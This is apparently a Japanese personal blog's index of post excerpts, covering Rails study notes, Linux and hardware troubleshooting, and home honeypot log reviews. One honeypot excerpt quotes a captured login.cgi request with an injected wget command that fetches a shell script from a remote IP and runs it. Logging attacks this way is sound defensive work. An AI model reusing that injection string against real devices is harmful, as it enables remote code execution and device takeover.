読んだもの このページは図解もわかりやすいし、状況も似ていたので、ありがたかった。しかし、最後のrebase -iでコミットをまとめてしまうのは、後で見返す際に良い影響があるとは思えないので微妙だと感じた。 git rebaseを初めて使った際のまとめ - Qiita…

すっかり忘れてました 他の人がハニポで観測しているのを見て思い出しました。 公式のお知らせ 公式からのお知らせによると、11月14日(水) に開始し、来年１月末までを目途に継続して行われるとのこと。その際使用されるIPアドレスは、210.150.186[.]238, 12…

隠しフィールド form_forを利用したフォーム内に隠しフィールドを設定する。 <%= form_for(@user, url: password_reset_path(params[:id])) do |f| %> <%= render 'shared/error_messages' %> <%= hidden_field_tag :email, @user.email %> <%= f.label :pas…

ActionMaier Railsに標準で組み込まれている、メールを送信してくれる機能。text形式とhtml形式のテンプレートメールを生成する事ができ、宛先や件名含めコントローラから簡単に生成する事ができる。メイラーの生成は下のコマンド。後ろの二つは追加するメソ…

form_for(@user)の判定 form_forを利用すると自動で入力フォームとそのsubmit先の設定等を設定し表示できるようにしてくれる。一般にcreateアクションとeditアクション用のフォームは同じform_for(@user)で生成される。このアクションの違いは@user内のnew_r…

Ruby5.1前まではフォームを生成してくれるメソッドとして、form_forとform_tagがあった。特にRubyチュートリアルでは2018/11/18現在、form_forを利用した方法を紹介しています。が、5.1以降はform_with推奨とのことなので、書き換えようと思いました。 form_…

SecureRandom.urlsafe_base64 Ruby標準ライブラリのメソッド。長さ22文字の文字列を生成してくれる。base64文字列なので64の22乘通りあるため、衝突の可能性も限りなく低い。 アクセサ インスタンス変数のゲッターとセッターのこと。rubyのクラスのインスタ…

セッションとクッキー 混同しがち(自分だけかも、)HTTPはステートレスなプロトコルなので、セッションのような物を実装するには、状態を保存するものが別に必要なる。それの一つがクッキー。クッキーはユーザのブラウザ内に保存される小さなテキスト。一方セ…

こんにちは。目立つログが残っていたので、メモしておきます。まず、今月のここまでのハニポ全体の記録をみてみます。 今の所今月一のアクセス数です。では中身を見てみます。上のグラフと形が似てしまっていますが、今日（14時まで）の記録です。 Cowrieが…

サイトにデバッグ情報表示 下のコードをレイアウトのコードに挿入することで、描画されるページの状態を把握するのに役立つ情報をサイトに表示することができる。if~文は開発環境でのみデバッグ情報を表示するよう指定している。 #app/views/layouts/applica…

2018/11/6 12:00~12:30 イギリスからpop3(110番)へのブルートフォース攻撃をhoneytrapで検知。大した量じゃないけれど、通常時は観測しないイベントだったのでここに書いておきます。 Suricataでのアラート名はET SCAN Rapid POP3 Connections - Possible Br…

ふとこの記事が何故か下書きで眠っていました。書きかけだったのでしょうか、、？とりあえず公開しておきます。 導入 Dionaeaのバージョンは0.6.0です。/opt/dionaea/etc/dionaea/ihandlers-available/virustotal.yamlを/opt/dionaea/etc/dionaea/ihandlers-…

Model データモデルとして扱うデフォルトのデータ構造のことをモデルと呼ぶ。データベースとのやり取りを行うライブラリはActiveRecordで、データオブジェクトの生成・保存・検索のメソッドをもつ。よって、SQL文を書かない。マイグレーション機能はデータの…

全く書くことがなく気がついたらこんなに日が空いてしまいました。(パソコン修理とかしてたしね) 本日珍しくdionaeaの検知数がCowrieを超えたので報告しておきます。 2018/11/5 00:30~ 上のグラフはここ一週間のt-potへの総アクセスを集計したものです。11/5…

症状 私のMacBookPro(2016)のディスプレイが突如映らなくなりました。正確に表現すると、ディスプレイを30%以上開くと映らなくなります。caps lockのランプは付く状態であったため、ディスプレイの問題かロジックボード根本の問題と予想。ただ、外部出力でモ…

Bootstrap twitter社製作とのこと。webデザインとユーザインターフェースの面で恩恵を受けられる。特に、レスポンシブデザインであるのが強み。スタイルシートはapp/assets/stylesheets/に置くことで、application.cssの一部としてwebのレイアウトに読み込ま…

pry テストコードでバックするときに導入しました。確認したいコードの手前にbinding.pryと書くとテストコンソールでブレークできる。そこでpp response.bodyと打てばレスポンスの中身を確認できるので、デバッグにとても便利。ちなみにquitを入力すればテス…

モデルとか scaffoldで生成したモデルはApplicationRecordクラスを継承している。ApplicationRecordクラスは、Active Recordが提供する基本クラス ActiveRecord::Base を継承している。これによりモデルオブジェクトはデータベースにアクセスできるようにな…

ruby関係の勉強を始めたので個人的なメモとか残していきます。チュートリアルに関してはこちらのサイトを参考にして進めていきます。 Gem ライブラリの事。rubyではGemと呼ぶらしい。railsもgem。gemはグローバルに必要なもの以外はそれぞれのプロジェクトに…

だいぶ日が空いてしまいましたが、3回目です。と言っても対して知識も増えていないので、いつも通り眺めるだけです。 全体のログ いつも通りCowrieでは短時間の集中アクセスを度々受けていますね。目立つものとしてはロシアとカタールからでしょうか。カター…

めでたく2回目を迎えました。ぱちぱち 気になったこと少しだけ書きます。目立ったものは２つ。 中国からのアクセス(10/5, 17:00~10/6, 2:00) 112.250.190[.]96からも32477回のアクセスを受けていますね。デフォルトのパスワードを試して侵入しようとしている…

東京都立産業技術高等専門学校 品川キャンパスでSECCON Beginners NEXTと言うセミナーが開催されました。そんなにCTFに力を入れてやっているわけではないですが、上級者の方達はどんな思考で問題を解いているのか気になったので、ダメもとで申し込んだ結果参…

ちゃっかり記事に数字入れてますが、続くかわかりません。ハニポ(セキュリティも)初心者が自宅のハニポを見て思ったことをテキトーに綴って行きます。 アクセス Cowrieへのアクセスが圧倒的に多いですね。時間軸で見ると、いつアクセスが多くなったのかがわ…

z3pyとは Z3はMicrosoft Researchが開発したSAT・SMTソルバである． ブール代数の充足問題に限らず，整数や実数上の不等式を含む充足問題にも適用できる． z3pyはZ3のPythonバインディングであり，Z3に付属している．https://wiki.mma.club.uec.ac.jp/CTF/To…

昔大学でデュアルブートは一度やったので知識的には大丈夫でしたが、色々詰まったところもあったのでメモしておきます。 基本的に以下の記事に沿えばできるので、補足情報を書くぐらいです。 初心者向けLinux入門：デュアルブートでubuntuをインストール USB…

つい先日までdionaeaを運用していたのですが、急遽T-potを栽培することに。理由は色々ありますが、一番の原因はDionaeaFRが動かなかったこと。(いや動かすところまでは頑張った。。)てことで、前まではVPS上で動いていたハニポを自宅に置きます！ 動作環境 $…

以下のようなエラーがCUI上にバンバン出てきて困りました。 PCIe Bus Error: severity=Corrected, type=Physical Layer,id=0030(Receiver ID) 私は以下のように変更することで治りはしませんでしたが、出力される頻度は格段に減りました。一応共有しておきま…

systemdが適用されたUbuntuでは以下のようにしてCUIに変更が可能 sudo systemctl set-default multi-user.target デュアルブートでubuntuを走られせていたのですが、変更後再起動したら真っ暗な画面が延々と表示されヒヤヒヤしましたが、[f1]キーを押すとロ…

短めです。下のログはdionaeaで検知したログ。スペースと改行の表記がうまくできていないのはご了承ください。 stream = [('in', b'GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1\x0…

今回は短く、UPnPのログに関して。 UPnP ウィキペディアさんには、Universal Plug and Play (UPnP)は、機器を接続しただけでコンピュータネットワークに参加することを可能にするプロトコルである。機器をコンピュータに接続するだけで利用可能になるPlug an…